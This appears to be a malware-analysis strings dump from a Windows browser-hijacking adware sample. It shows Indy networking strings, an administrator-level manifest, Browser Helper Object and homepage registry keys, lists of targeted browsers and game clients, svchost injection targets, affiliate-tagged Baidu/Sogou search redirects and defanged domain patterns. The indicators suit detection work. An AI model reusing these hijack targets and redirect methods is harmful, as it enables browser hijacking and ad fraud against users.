SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError4.C
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClientPKC
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequestxuC
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTPtxC
TIdHTTP
HTTPOptions
Port\hC
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
KERNEL32.DLL
NTDLL.DLL
TIdUDPBase
TIdUDPBaset7D
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Uh.BD
Ínor%xom
Ínor%o|od~
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
b~~z0%%id}r$?2kn$idÍnor%mo~ilm5cn7
8$:$;$;2
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
NY.Az
y:%d[v
}.ZqqU
2.Ew5
:8%fr
b.cg`
'.tO:
8.MZ%r
Z.BxYd
BKDb%x
SqLWE
,|H.na
h%c<)
'.y
[Y.am
(AP.LV
%XWiD
q%d*,L
*c.TH
H!%f*
).qN\
$cJ%U
.Fg>Ir"
*0.Co
.dx]&
!.ni`
a.gq1
#.Ov^7
*5bL
&%C@cc
~%%Uf
;[a%X
TCpC 1
.uY=%
&.nlM
v_n/%U|
Ls.yX
~%c<)&
.5.Di
`.ez6
cg.Nh
Y0%X%
udPN
NT*%D_
n.IQ?N:
Eb~%u
`z.Og
Cx.MX7
J.wgqD
 SM.HOv
%X9nD
~d%D:s
'w".NR
.ZL}%
3D`\.lc
Î6>nB
_!.RF
%D_#}
'%$%X
;J.SP
X4j.JaKYu
.tRFL
^.oeH
.jWTvT{
%C\R"
"(#I.ZGG
×FeW
%d<0=
k`%fn
?456789:;<=
!"#$%&'()* ,-./0123
C:\Windows\CLOG.txt
2016-11-22
07:46:15
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
GetWindowsDirectoryA
GetCPInfo
MsgWaitForMultipleObjects
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ADVAPI32.DLL
ntdll.dll
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
<requestedExecutionLevel level="requireAdministrator"/>
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_001E0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_002B0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_00401000_00131000:

kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortX
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError4.C
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClientPKC
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequestxuC
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTPtxC
TIdHTTP
HTTPOptions
Port\hC
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
KERNEL32.DLL
NTDLL.DLL
TIdUDPBase
TIdUDPBaset7D
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Uh.BD
Ínor%xom
Ínor%o|od~
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
b~~z0%%id}r$?2kn$idÍnor%mo~ilm5cn7
8$:$;$;2
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
NY.Az
y:%d[v
}.ZqqU
2.Ew5
:8%fr
b.cg`
'.tO:
8.MZ%r
Z.BxYd
BKDb%x
SqLWE
,|H.na
h%c<)
'.y
[Y.am
(AP.LV
%XWiD
q%d*,L
*c.TH
H!%f*
).qN\
$cJ%U
.Fg>Ir"
*0.Co
.dx]&
!.ni`
a.gq1
#.Ov^7
*5bL
&%C@cc
~%%Uf
;[a%X
TCpC 1
.uY=%
&.nlM
v_n/%U|
Ls.yX
~%c<)&
.5.Di
`.ez6
cg.Nh
Y0%X%
udPN
NT*%D_
n.IQ?N:
Eb~%u
`z.Og
Cx.MX7
J.wgqD
 SM.HOv
%X9nD
~d%D:s
'w".NR
.ZL}%
3D`\.lc
Î6>nB
_!.RF
%D_#}
'%$%X
;J.SP
X4j.JaKYu
.tRFL
^.oeH
.jWTvT{
%C\R"
"(#I.ZGG
×FeW
%d<0=
k`%fn
?456789:;<=
!"#$%&'()* ,-./0123
C:\Windows\CLOG.txt
2016-11-22
07:46:15
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
GetWindowsDirectoryA
GetCPInfo
MsgWaitForMultipleObjects
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ADVAPI32.DLL
ntdll.dll
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
ECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value('%s' is not a valid floating point value
I/O error %d

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_00533000_00002000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ntdll.dll
Rpcrt4.dll

SearchProtocolHost.exe_3844:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

86ae56633941c20e9a65a719b5a2208.exe_2388_rwx_02BF1000_00182000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
PSAPI.dll
ole32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort
OnExecute
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFilel
OnGetPassword
EIdOSSLLoadingRootCertError8
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP`
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse(
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
TIdHTTP$
HTTPOptions\
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserApph
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop$
OnWindowSetWidthp
OnWindowSetHeight
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizableP
OnWindowSetTop
OnWindowSetWidth<
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
1.2.8
TIdUDPBase
IdUDPBase
255.255.255.255
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
IdUDPServer
DefaultPortx
OnUDPRead
TIdUDPClient
IdUDPClient
Port<
"TProcess_WinProc_WinHWND_Operating
TMyCheckHttpRedirectUrl
TMyBrowserCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
baidu.3v32.com
.qq.com/
Ínor%o|od~
Ínor%nk~k
%s [%8X][%d]
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
.dll, RunIt
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
dllhost.exe
svchost.exe
*.dll
684EF56E-2FAE-4ed2-BF46-F0440C5BE24F
%WinDir%\sysnative\
$%X,$%X;
ids.exe
GameLogin\
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
http:
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
8:;9$8$;$;
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
YY.exe
qqbrowser.exe
Juzi.exe
2345chrome.exe
twchrome.exe
opera.exe
115Chrome.exe
Ruiying.exe
SaaYaa.exe
LolClient.exe
ADSafeSe.exe
mk~$ieg%ss
mk~2$idþf
UrlAD:
VVV.baidu.com/s?
Get url Err...
Windows NT\Accessories\
acLuaua.dll
explorer.exe
HintSock.dll
sogou.com
VVV.sogou.com/index.htm?pid=
{D878EB20-C55A-4402-8B25-6387D34F10CB}
{4958F3A2-1032-49af-8BDC-FA4C0C0931ED}
{77EEBB61-8868-4FA1-8A9D-AB54F43C7D92}
{992B79F3-7E84-4C58-AD30-0B72034EC192}
{AF9143FF-D8F3-4ACE-B736-4757B5918388}
{E58EE67D-E279-4C21-B87C-E9DCC9EA6F1F}
{8605FF4E-830B-4E07-A811-FDB48E8BF0BB}
{00000000-0593-4356-9CF7-1D8C2B3343C0}
{452700E0-9F72-421E-8ACC-1948A30751BD}
{505D8605-AB58-4243-8BA0-D7FE50A79698}
{19F620A5-6106-453A-856D-D66E967C45D8}
{F7AD480D-C4A9-4816-96B0-49620E1C1141}
{9D03EDFD-BB04-4E90-AFEA-42B84C6E2141}
{BC10E8CB-3CFA-4F61-A5E1-846506D33FAF}
{7390f3d8-0439-4c05-91e3-cf5cb290c3d0}
{77FEF28E-EB96-44FF-B511-3185DEA48697}
{6E28339B-7C6E-47B6-AEB2-46BA53782379}
{02AC20DD-5548-4CA7-ACCF-18AFE5A4A072}
{3C696E52-BF38-49A8-9017-ACE15A794707}
{4D8CE2EB-5AC8-47F9-8103-3A8AC5B868DF}
{29CF293A-1E7D-4069-9E11-E39698D0AF95}
Software\Microsoft\Internet Explorer\TypedURLs
-AAB6-4EFB-8BD1-
clog.txt
CDCLOG.txt
VVV.sun0769.com
VVV.hg6288.com
2.0.1.60
RestoreTCP
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
hXXps://VVV.baidu.com/s?word={searchTerms}&tn=
123.sogou.com/?
hXXps://VVV.sogou.com/sie?
VVV.sogou.com
msdialg100_D.dll
BarClient.exe
BarClientView.exe
b~~z0%%}}}$bkeye
hXXp://88.36q3.com/16?nid=1
hXXp://sss.uc48.com/so11?nid=1
hXXp://22c.i35999.com/221
Beep.pdb
doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
BACK.pdb;goodtdi.pdb;
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
